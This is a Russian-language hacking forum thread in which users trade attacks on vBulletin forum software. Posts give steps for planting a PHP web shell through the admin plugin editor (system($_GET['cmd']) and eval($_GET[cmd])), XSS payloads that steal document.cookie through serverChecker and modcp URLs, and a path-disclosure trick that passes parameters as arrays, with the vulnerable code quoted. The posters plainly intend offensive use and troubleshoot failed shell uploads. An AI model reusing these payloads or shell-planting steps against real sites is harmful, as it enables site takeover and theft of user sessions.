30.12.2009, 12:32
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
Root-access для удачной эксплуатации "плоент" надо немного изменить
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
30.12.2009, 19:08
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
С нами:
9419426
Репутация:
648
|
|
Сообщение от blackybr
Root-access для удачной эксплуатации "плоент" надо немного изменить
Да я уже понял, что там ошибка, только пока её не исправил.
Структура данных там такая:
vB_Shutdown Object ( [shutdown] => Array ( [0] => phpinfo ) )
Надо её исправить...
Последний раз редактировалось Root-access; 30.12.2009 в 19:26..
|
|
|
|
31.12.2009, 19:00
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами:
9364549
Репутация:
184
|
|
Пытался залить шелл по инструкции:
Плагины и Продукты -> Добавить новый плагин -> Во вкладке "Plugin PHP Code" пишем:system($_GET["cmd"]);
Однако при попытке захода:
Content Encoding Error
The page you are trying to view cannot be shown because it uses an invalid or unsupported form of compression.
* Please contact the website owners to inform them of this problem.
В чем причина и как обойти? |
|
|
|
01.01.2010, 00:48
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
budden, попробую вписать eval($_GET[cmd]), дальше site.ru/forum/faq.php?cmd=phpinfo(); или сразу весь код шелла запихнуть, дальше site.ru/forum/faq.php смотри что вышло
P.S не в ту тему написал
Последний раз редактировалось .:[melkiy]:.; 01.01.2010 в 14:52..
|
|
|
|
05.01.2010, 18:45
|
|
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
С нами:
9600218
Репутация:
277
|
|
Раскрытие путей
vBulletin® Version 3.8.4
Код:
localhost/vb/calendar.php?do[]=[]add&[]type=[]recur&c=[]%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
Код:
Warning: trim() expects parameter 1 to be string, array given in C:\xampp\htdocs\vb\includes\class_core.php on line 1651
Уязвимый код:
PHP код:
function xss_clean($var)
{
static
$preg_find = array('#^javascript#i', '#^vbscript#i'),
$preg_replace = array('java script', 'vb script');
return preg_replace($preg_find, $preg_replace, htmlspecialchars(trim($var)));
}
UPD
Код:
http://localhost/vb/forumdisplay.php?do[]
Код:
Unable to add cookies, header already sent.
File: C:\xampp\htdocs\vb\includes\class_core.php
Line: 3277
Код:
Warning: trim() expects parameter 1 to be string, array given in C:\xampp\htdocs\vb\includes\class_core.php on line 1651
Уязвимый код:
PHP код:
foreach (array('_GET', '_POST') AS $arrayname)
{
if (isset($GLOBALS["$arrayname"]['do']))
{
$GLOBALS["$arrayname"]['do'] = trim($GLOBALS["$arrayname"]['do']);
}
$this->convert_shortvars($GLOBALS["$arrayname"]);
}
Все GET и POST данные с параметром будет обрабатываться функцией trim,а если сделать их массивом,возникает ошибка.
(C)Xcontrol212
Последний раз редактировалось Xcontrol212; 05.01.2010 в 23:20..
|
|
|
|
10.02.2010, 23:50
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
регулярка для хоста неправильная, но по всей видимости это спецпорог, т.к. очевидно, что специальная ошибка
|
|
|
|
07.03.2010, 00:06
|
|
Познающий
Регистрация: 14.05.2009
Сообщений: 92
С нами:
8944114
Репутация:
5
|
|
Нашол минут 5 назад.
Незнаю боян не боян, но у себя на форуме версии 3.8.2 когда заходишь в профиль можно написать "Публичное сообщение"
Такой код проходит свободно.
><script>alert(/byby/)</script>
Последний раз редактировалось iGlass; 14.03.2010 в 18:42..
|
|
|
|
vBulletin® версия 3.7.0 Gold |
19.03.2010, 19:13
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
vBulletin® версия 3.7.0 Gold
http://forum/serverChecker/?IP=**.**.***.***&port=29901"><script>alert(docume nt.cookie)</script>
(c)Feldmarschall
|
|
|
|
23.03.2010, 01:52
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Как вы задолбали =\
Не надо ставить копирайты на этого inj3ct0r'а - это копипастер\плагиатор.
Посмотрите у китайцев, эта бага лежит с 9 числа, и если этот клоун поставил туда своё авторство, это не значит, что он автор
http://sebug.net/vulndb/19240/
|
|
|
|
29.04.2010, 03:23
|
|
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
С нами:
9083308
Репутация:
719
|
|
Банальная XSS.
vBulletin® Version 3.8.2
Код:
http://site.ru/forum/modcp/index.php?loc=javascript:document.write('<script>alert(document.cookie);</script>');
PS. В теме не нашел, в гугле тоже не заметил, что кто то выкладывал. 
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1794544){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1995047){kind=avatar}
Похожие темы
Комбинированный вид
